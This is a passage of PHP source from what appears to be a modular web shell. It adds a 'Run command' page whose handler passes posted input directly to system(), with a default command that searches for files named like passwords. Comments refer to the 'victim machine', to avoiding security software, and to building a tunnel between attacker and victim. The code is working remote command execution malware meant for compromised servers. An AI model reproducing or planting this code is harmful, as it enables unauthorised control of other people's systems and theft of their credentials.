If triggering alert is not a problem, safely ignore this alert, otherwise carefully examine the victim machine and ensure that there is no security solution running before using this module." ), __PREFIX__makeForm( $page, $_SERVER["REQUEST_URI"], array( __PREFIX__makeInput( "textarea", "Command", "__PARAM_1__", "ls -lah | grep pass", "Command to run through the default system shell. This can be used to establish a full duplex tunnel between the attacker and the victim machine.", true ), ) ), ) ); } /** * Handle the login operation * * @param $operation string The operation to handle * @param $features array{title: string, description: string, svg: string, hidden?: bool, op: string}[] The features * * @return void */ function __PREFIX__handleSystemCommand($operation, $features) { system($_POST["__PARAM_1__"]); } /** * Hook the features to add the login feature * * @param $features array{title: string, description: string, svg: string, hidden?: bool, op: string}[] The features * container * * @return void */ function __PREFIX__systemCommandHooksFeatures(&$features) { global $RUN_COMMAND; $features[] = array( "title" => "Run command", "description" => "Run a system command using the default shell.", "svg" => ' ', "op" => $RUN_COMMAND, ); } // section.functions.end // section.hooks add_hook("features", "__PREFIX__systemCommandHooksFeatures"); add_named_hook("GET_page", $RUN_COMMAND, "__PREFIX__makeSystemCommandPage"); add_named_hook("POST_operation", $RUN_COMMAND, "__PREFIX__handleSystemCommand"); // section.hooks.end